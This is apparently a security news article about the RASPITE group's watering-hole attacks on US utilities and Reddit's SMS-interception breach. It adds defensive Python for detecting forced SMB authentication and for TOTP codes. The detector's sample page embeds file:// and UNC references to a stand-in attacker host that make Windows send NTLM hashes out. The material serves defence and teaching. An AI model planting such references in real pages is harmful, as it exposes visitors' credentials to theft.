A known threat group believed to be based in Iran is trying to gain access to computer infrastructure belonging to U.S. electric utility organizations.
The group, which researchers from industrial control systems (ICS) security firm Dragos track as RASPITE, has been operating since 2017 and has previously targeted organizations from the United States, Middle East, Europe and East Asia. The attack activity against the electric utility sector appears to be more recent and is focused on the United States, the researchers said in a new report.
The group compromises websites that its intended targets are likely to visit (a watering hole) and embeds a specially crafted link, typically a file:// URL or UNC path placed in an image or stylesheet reference that the browser fetches automatically, which prompts victims’ Windows computers to open an outbound SMB connection to a server the attackers control. Because Windows authenticates to the remote server without user interaction, this allows the attackers to harvest Windows credentials in the form of NTLM challenge-response hashes, which can be cracked offline or relayed. The same technique has also been used by other threat actors such as DYMALLOY and ALLANITE.
Using the stolen credentials, the attackers deploy scripts that install a malicious service on the victims’ computers. The service connects back to command-and-control infrastructure run by RASPITE and gives the attackers remote access to the infected systems.
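Defensively, the watering-hole step described above can be spotted on both ends: in the compromised page, where the injected reference is a file:// URL or UNC path inside an attribute the browser fetches on its own, and at the network edge, where a workstation opens SMB (TCP 139/445) to a host outside the organization. The Python below is an added example written for this article, not code from Dragos or Symantec; the page content, the firewall log format and the 203.0.113.10 attacker host are constructed, and the internal address space is assumed to be the RFC 1918 blocks.

```python
import re
from ipaddress import ip_address, ip_network

# Constructed example page: a legitimate-looking conference agenda into which an
# attacker has injected two references that Windows resolves over SMB/UNC.
# 203.0.113.10 is a documentation address standing in for the attacker host.
SAMPLE_HTML = r"""
<html><body>
<h1>Utility sector conference agenda</h1>
<img src="https://cdn.example.org/logo.png">
<link rel="stylesheet" href="file://203.0.113.10/share/style.css">
<img src="\\203.0.113.10\images\pixel.png" width="1" height="1">
<a href="https://example.org/agenda.pdf">Agenda (PDF)</a>
</body></html>
"""

# Constructed egress firewall log lines (assumed format): timestamp action src dst dport.
SAMPLE_FW_LOG = """
2018-07-30T14:02:11Z ALLOW 10.20.5.17 10.20.1.8 445
2018-07-30T14:02:13Z ALLOW 10.20.5.17 203.0.113.10 445
2018-07-30T14:02:14Z ALLOW 10.20.5.17 198.51.100.20 443
2018-07-30T14:02:15Z DENY 10.20.5.22 198.51.100.7 139
"""

# Attribute values a browser fetches without any user interaction.
ATTR_RE = re.compile(r'''(?i)\b(src|href|data|background)\s*=\s*["']([^"']+)["']''')
# file: URLs and UNC paths (\\host\share) both make Windows open an SMB session
# and send NTLM challenge-response material to the named host.
SMB_REF_RE = re.compile(r'(?i)^\s*(?:file:/*|\\\\)([^/\\]+)')

# Assumed internal address space (RFC 1918); adjust to the organization's own ranges.
INTERNAL_NETS = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
SMB_PORTS = {139, 445}
FW_RE = re.compile(r'^(\S+)\s+(ALLOW|DENY)\s+(\S+)\s+(\S+)\s+(\d+)$')


def find_smb_forcing_refs(html):
    """Return (attribute, value, target_host) for every reference that forces an SMB connection."""
    hits = []
    for attr, value in ATTR_RE.findall(html):
        m = SMB_REF_RE.match(value)
        if m:
            hits.append((attr.lower(), value, m.group(1)))
    return hits


def outbound_smb_events(log_text):
    """Return firewall events on SMB ports to destinations outside the internal address space.
    Denied attempts are kept too: a workstation trying to reach SMB outside is itself a signal."""
    events = []
    for line in log_text.strip().splitlines():
        m = FW_RE.match(line.strip())
        if not m:
            continue  # skip lines that do not match the constructed format
        ts, action, src, dst, dport = m.groups()
        dst_ip = ip_address(dst)
        if int(dport) in SMB_PORTS and not any(dst_ip in net for net in INTERNAL_NETS):
            events.append({"ts": ts, "action": action, "src": src, "dst": dst, "dport": int(dport)})
    return events


def correlate(html, log_text):
    """Hosts named by injected SMB references that also appear as external SMB destinations."""
    ref_hosts = {host for _, _, host in find_smb_forcing_refs(html)}
    fw_hosts = {e["dst"] for e in outbound_smb_events(log_text)}
    return sorted(ref_hosts & fw_hosts)


if __name__ == "__main__":
    for hit in find_smb_forcing_refs(SAMPLE_HTML):
        print("injected SMB reference:", hit)
    for ev in outbound_smb_events(SAMPLE_FW_LOG):
        print("external SMB egress:", ev)
    print("correlated attacker hosts:", correlate(SAMPLE_HTML, SAMPLE_FW_LOG))
```

The page-side check is useful for site owners auditing their own content; the firewall-side check is the one that catches the technique regardless of which site was compromised, and the simplest preventive control is the same rule it looks for: block outbound TCP 139/445 from workstations at the perimeter.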
“RASPITE’s activity to date currently focuses on initial access operations within the electric utility sector,” the Dragos researchers said in a blog post. “Although focused on ICS-operating entities, RASPITE has not demonstrated an ICS-specific capability to date. This means that the activity group is targeting electric utilities, but there is no current indication the group has the capability of destructive ICS attacks including widespread blackouts like those in Ukraine.”
While Dragos doesn’t link RASPITE to Iran in its report, the company says that the group “maps to a group called LeafMiner by security firm Symantec.” Symantec released a detailed report last month about LeafMiner’s methods of operations and attacks in the Middle East.
According to Symantec, LeafMiner relies on publicly available tools and techniques, including proof-of-concept exploits. For example, it adopted the watering-hole credential-harvesting technique used by another group called Dragonfly (which Dragos tracks as DYMALLOY) and developed payloads for the Fuzzbunch exploitation framework leaked by the Shadow Brokers.
“The group appears to be based in Iran and seems to be eager to learn from and capitalize on tools and techniques used by more advanced threat actors,” Symantec said in its report.
The group’s victims to date include a broad list of government organizations and businesses from various industry verticals in Saudi Arabia, Lebanon, Israel, Kuwait and other countries. Even if its attacks so far have not been destructive, the group’s recent focus on the U.S. energy sector might signal a shift in intentions.
SMS Interception Allowed Attackers to Compromise Reddit Employees
Reddit suffered a data breach in June that resulted in some user information being stolen, the company announced Aug. 1. The breach was the result of some employee accounts being compromised despite being protected by two-factor authentication (2FA).
“On June 19, we learned that between June 14 and June 18, an attacker compromised a few of our employees’ accounts with our cloud and source code hosting providers,” Reddit engineers said. “Already having our primary access points for code and infrastructure behind strong authentication requiring two factor authentication (2FA), we learned that SMS-based authentication is not nearly as secure as we would hope, and the main attack was via SMS intercept. We point this out to encourage everyone here to move to token-based 2FA.”
The fact that SMS is not a secure channel for sensitive information such as authentication codes has been known for years. One reason is the SS7 signaling protocol, which telecom operators use to interconnect on the global roaming network: an attacker with SS7 access can impersonate a subscriber and redirect that subscriber’s text messages to a device under the attacker’s control. SMS codes can also be captured without touching SS7, for instance by convincing a carrier to move the victim’s number to a new SIM (SIM swapping) or with malware on the phone, so the weakness is the channel itself, not one protocol.
In 2017, attackers exploited SS7 weaknesses in Germany to intercept the SMS transaction codes used by online banking and drained money from victims’ accounts. Researchers have also shown how the same technique can be used to take over online Bitcoin wallets by intercepting the codes sent during login or password reset.
Reddit was somewhat lucky because attackers only obtained read access to an old database from 2007 that contained usernames, email addresses, hashed passwords and public and private messages. They were also able to access more recent email digests sent to users over a limited period in June, but those only exposed online usernames and email addresses.
Incidents such as this one shouldn’t discourage users and companies from using two-factor authentication; any second factor is still more secure than a password alone. However, when an online service offers alternatives to codes sent over SMS, such as codes generated locally by an authenticator app or, better still, a hardware security key, it’s best to use those. App-generated codes never cross the carrier network, and security keys go one step further by binding the authentication to the website’s origin, so they can’t be replayed through a phishing page the way an SMS or app code can.
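To make the SMS-versus-app distinction concrete: an authenticator app derives each code locally from a secret shared once at enrollment (RFC 6238 TOTP, built on RFC 4226 HOTP), so no code is ever transmitted to the user and there is nothing for an SS7 or SIM-swap attacker to intercept in transit. The Python below is an added example, not Reddit’s code or that of any particular authenticator or provider; it uses the RFC 4226/6238 reference secret so its output can be checked against the RFC test vectors, and the replay guard and clock-skew window are design choices of this example rather than anything the article describes.

```python
import hashlib
import hmac
import struct
import time

# RFC 4226 / RFC 6238 reference secret, used here only so the output can be checked
# against the published test vectors. A real service generates a random secret per
# user and shares it once (usually as a QR code) at enrollment.
REFERENCE_SECRET = b"12345678901234567890"


def hotp(secret, counter, digits=6, algo=hashlib.sha1):
    """HMAC-based one-time password (RFC 4226) over an 8-byte big-endian counter."""
    msg = struct.pack(">Q", counter)
    digest = hmac.new(secret, msg, algo).digest()
    offset = digest[-1] & 0x0F  # dynamic truncation: low nibble of the last byte picks the window
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret, unix_time=None, step=30, digits=6, algo=hashlib.sha1):
    """Time-based one-time password (RFC 6238): HOTP with the counter set to the current time step."""
    if unix_time is None:
        unix_time = time.time()
    return hotp(secret, int(unix_time) // step, digits, algo)


class TotpAuthenticator:
    """Server-side verifier. Accepts the current time step or +/- `window` adjacent
    steps to tolerate clock skew, and rejects reuse of a code that was already accepted
    (a code observed by an attacker is useless once the legitimate user has used it)."""

    def __init__(self, secret, step=30, digits=6, window=1):
        self.secret = secret
        self.step = step
        self.digits = digits
        self.window = window
        self.last_counter = -1  # highest time step already accepted for this user

    def check(self, submitted, unix_time=None):
        if unix_time is None:
            unix_time = time.time()
        counter = int(unix_time) // self.step
        for delta in range(-self.window, self.window + 1):
            candidate = counter + delta
            expected = hotp(self.secret, candidate, self.digits)
            # compare_digest keeps the comparison constant-time so it does not leak
            # how many leading digits of the guess were right.
            if hmac.compare_digest(expected, submitted) and candidate > self.last_counter:
                self.last_counter = candidate
                return True
        return False


if __name__ == "__main__":
    # RFC 6238 Appendix B: at Unix time 59 the 8-digit SHA-1 TOTP is 94287082.
    print("TOTP at t=59:", totp(REFERENCE_SECRET, 59, digits=8))
    auth = TotpAuthenticator(REFERENCE_SECRET)
    print("first use accepted:", auth.check(totp(REFERENCE_SECRET, 59), 59))
    print("replay accepted:", auth.check(totp(REFERENCE_SECRET, 59), 59))
```

Note what this does and does not buy: the code is computed on both ends from the shared secret, so the carrier never sees it, but a user can still be tricked into typing it into a phishing page that relays it to the real site within the 30-second window. Only an origin-bound hardware key closes that gap, which is why it is the stronger option the article mentions.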